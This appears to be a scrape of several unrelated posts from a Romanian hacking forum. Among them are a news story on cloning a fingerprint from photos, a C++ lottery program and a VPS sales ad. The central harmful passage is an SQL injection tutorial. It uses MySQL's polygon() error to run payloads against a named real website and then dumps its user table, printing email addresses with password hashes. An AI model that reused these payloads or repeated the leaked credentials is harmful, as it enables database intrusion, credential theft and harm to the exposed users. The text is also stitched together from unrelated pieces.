Leaderboard

Hackers have already bypassed Apple's fingerprint scanner using fake fingerprints, and now they have found a way to reproduce your fingerprints by using just a couple of photos of your fingers. Special Fingerprint sensors have already been used by Apple and Samsung in their smartphones for authentication purposes and in near future fingerprints sensors are believed to be the part of plenty of other locked devices that can be unlocked using fingerprints, just to add an extra layer of authentication. But, How secure are your fingerprints? A member of Europe's oldest hacker collective, the Chaos Computer Club (CCC), claimed to have cloned a fingerprint of a Germany's federal minister of defense, Ursula von der Leyen, using pictures taken with a "standard photo camera" at a news conference. At the 31st annual Chaos Computer Conference in Hamburg Germany this weekend, biometrics researcher Starbug, whose real name is Jan Krissler, explained that he used a close-up photo of Ms von der Leyen's thumb that was taken with a "standard photo camera" at a presentation in October -- standing nine feet (3 meters) away from the official. He also used several other pictures of her thumb taken at different angles. Starbug then used a publicly available software program called VeriFinger with photos of the finger taken from different angles to recreate an accurate thumbprint. According to CCC, this software is good enough to fool fingerprint security systems. "After this talk, politicians will presumably wear gloves when talking in public," Starbug told the audience at the Chaos Computer Conference (CCC) conference. However, this is not the very first time when Chao Computer Club has targeted fingerprints. In past, the group has demonstrated how easily the Apple iPhone 5s can be unlocked using a fake fingerprint obtained from an individual who has touched a shiny surface, such as glass or a smartphone screen. "This demonstrates—again—that fingerprint biometrics is unsuitable as [an] access control method and should be avoided," the group said at the time. Moreover, just three days after the launch of the Galaxy S5, hackers successfully managed to hack Galaxy S5 Fingerprint sensor using a similar method that was used to spoof the Touch ID sensor on the iPhone 5S. But this recent hack did not require any object 'carrying the fingerprints anymore,' which means that any person could potentially steal someone's fingerprint identity from photos posed on Facebook, Twitter or any social networking site. This new finding by Starbug potentially calls into question the effectiveness of fingerprint scanners as a security measure. Fingerprints have been supported in the past as biometric identifiers, but because it can be easily reproduced, using fingerprints for security purposes raises questions. The practical danger is low, because even after obtaining your fingerprint, the data thieves would still need to have your devices or otherwise find a way to sign in using your biometric information. But, the concern is more as the method require no technical skill to perform the fingerprint cloning. http://thehackernews.com/2014/12/hacker-clone-fingerprint-scanner.html

This method based on the function polygon(). In a nutshell, this function constructs geometry collection. The vuln thing about it, that it can only work with the function point(). For example: SELECT polygon(point(53,12)); And the output is a bunch of ???'s. Not really exciting, ah ? For those who know a bit geometry, it goes like point(x,y). Now look whats happend when we dont use point(). SELECT polygon(53,12); Error 1367 (22007): Illegal non geometric '53' value found during parsing We get an error on our x argument, 53. So lets think a bit. If the error returns our string input as an string output, what would happend if we try to run a query ? SELECT polygon((select*from(select*from(select@@version)f)x)); Error 1367 (22007): Illegal non geometric '(select `x`.`@@version` from (select '5.5.38-35.2' AS `@@version` from dual) `x`)' value found during parsing Boom ! 5.5.38-35.2 Now lets try that on a real site. Conditions: mysql_error on. Lets get the version: http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select@@version)f)x)) 5.1.73-log Nice, but can we extract more ? Hell yeah. We will be using this to get tables: http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select group_concat(table_name) from information_schema.tables where table_schema=database())f)x)) blocklist,log_login,pernodmajorwinners,pernodmanagement,pernodmatches,pernodmess?ages,pernodnews,pernodpolls,pernodtopics,pernoduser Im interested in the table pernoduser, lets get columns: http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select group_concat(column_name) from information_schema.columns where table_name='pernoduser' )f)x)) pernodid,nickname,fullname,forumname,password,email,handicap,p_dbl,p_sgl,login,forumnotify,deleted And dump the table: http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select group_concat(email,0x3a,password) from pernoduser)f)x)) and.rogers@tiscali.co.uk:22fdf94cc29e7aff8ece472ed119c53e,butters65@hotmail.co.u?k:795b087b2ceb3482dc9956eb8f126ea3 And we get the data. To overpower the 'cut results', we can just add a condition in the end, " where email>last-email ". Hope you learned something ! Sursa: HF + Frostyhacks

Ceva de genul: #include "stdafx.h" #include <iostream> #include <string> using namespace std; const int Count = 10; struct Loto { int UniqueID; string Date; int Numbers[6]; }; int _tmain(int argc, _TCHAR* argv[]) { Loto LotoArray[Count]; //data in for(int i = 0; i < Count; i++) { cout << "Loto " << i + 1 << endl; //UniqueID LotoArray[i].UniqueID = i + 1; //Date cout << " Enter the date:"; cin >> LotoArray[i].Date; //Numbers for(int j = 0; j < 6; j++) { cout << " Enter number " << j + 1 << ":"; cin >> LotoArray[i].Numbers[j]; } } //... //data out for(int i = 0; i < Count; i++) { cout << "Loto " << i + 1 << endl; cout << " UniqueID: " << LotoArray[i].UniqueID << endl; cout << " Date: " << LotoArray[i].Date << endl; cout << " Numbers: "; for(int j = 0; j < 6; j++) { cout << LotoArray[i].Numbers[j] << " "; } cout << "" << endl; } system("PAUSE"); return 0; } UniqueID -->Daca ai doua extrageri in aceasi zi Sper ca nu vrei sa reinvetezi roata http://loto.ro/ap/frecventa-numere.html

Cartea in format pdf si epub o aveti mai jos : EPUP Zippyshare.com PDF Zippyshare.com Have Funk!

Spune-mi ai toate datele la fel? Poti sa garantezi ca datele o sa fie mereu in acelasi format? Ca sa stiu daca ma chinui cu verificari extinse in privinta datei, altfel, clasa e mai mult sau mai putin gata.

Source : Linux 2.6.39, 32-bit and 64-bit Local Root Exploit

Kronzy aka MR.Blackhat )))))))))))))) https://fbcdn-sphotos-g-a.akamaihd.net/hphotos-ak-xap1/v/t1.0-9/1604742_622819827789232_2118039429_n.jpg?oh=064489f34a87a9dfab3396a475448c55&oe=552FF25A&__gda__=1430605939_96170a5b18c6cf9b11b9edd15cd84cea

Invalid link.. Pls renew.

Servere virtuale la preturi bune: [TABLE=width: 550] [TR] [TD]Config #1 Entry Level VPS Server #1 512 MB RAM 1 CPU Core 3,2 GHz 15 GB RAID1 Storage 150 GB Premium Traffic HDD Storage 100 Mbps Uplink Speed 99.99% Uptime Guarantee ProxMox Powered $4 Mo or $45 Y[/TD] [TD]Config #2 Entry Level VPS Server #2 1 GB DDR3 Memory 2 CPU Core 3,2 GHz 30 GB RAID1 Storage * 650 GB Premium Traffic SSD Force 3* 100 Mbps Uplink Speed 99.99% Uptime Guarantee ProxMox Powered $7 Mo or $75 Y[/TD] [TD]Config #3 Standard VPS Server #1 2 GB RAM Memory 2 CPU Core 3,2 GHz 65 GB RAID1 Storage 2TB Premium Traffic SSD Force 3* 100 Mbps Uplink Speed 99.99% Uptime Guarantee ProxMox Powered $14 Mo or $158 Y[/TD][/TR] [TR][TD]Config #4 Standard VPS Server #2 4 GB RAM Memory 3 CPU Core 3,2 GHz 125 GB RAID1 Storage 2TB Premium Traffic SSD Force 3* 100 Mbps Uplink Speed 99.99% Uptime Guarantee ProxMox Powered $26 Mo or $299 Y[/TD] [TD]Config #5 Ultimate VPS Server 6 GB RAM Memory 4 CPU Core 3,2 GHz 200 GB RAID1 Storage 4TB Premium Traffic SSD Force 3* 100 Mbps Uplink Speed 99.99% Uptime Guarantee ProxMox Powered $42 Mo or $490 Y[/TD] [TD]Config #6 HighEnd VPS Server 8 GB RAM Memory 4 CPU Core 3,2 GHz 250 GB RAID1 Storage 4TB Premium Traffic SSD Force 3* 100 Mbps Uplink Speed 99.99% Uptime Guarantee ProxMox Powered $55 Mo or $640 Y[/TD][/TR] [/TR] [/TABLE] Oferim reducere membrilor RST dupa cum urmeaza: 10% pentru plata in avans pe 6 luni 20% pentru plata in avans pe 1 an Latimea de banda este garantata catre orice destinatie (EU/US/Asia) / Avem peer-uri private cu peste 300 de furnizori. Cu tot ce nu este peer, iesim cu conexiune prin Level3, Cogent, Telia, Hurricane Electric si NTT. De asemenea, pe BGP folosim solutiile Noction (in caz ca exista loss pe o routa aleasa de BGP, se comuta pe o alta) Nu se accepta child porn/spam/scan/phishing/fraude Adresele IP alocate sunt de Germania. Plata se poate face prin PayPal. Preturile de mai sus sunt finale si nu se mai adauga TVA sau altceva la ele. Cei interesati sunt rugati sa imi trimita Mesaj Privat pentru detalii.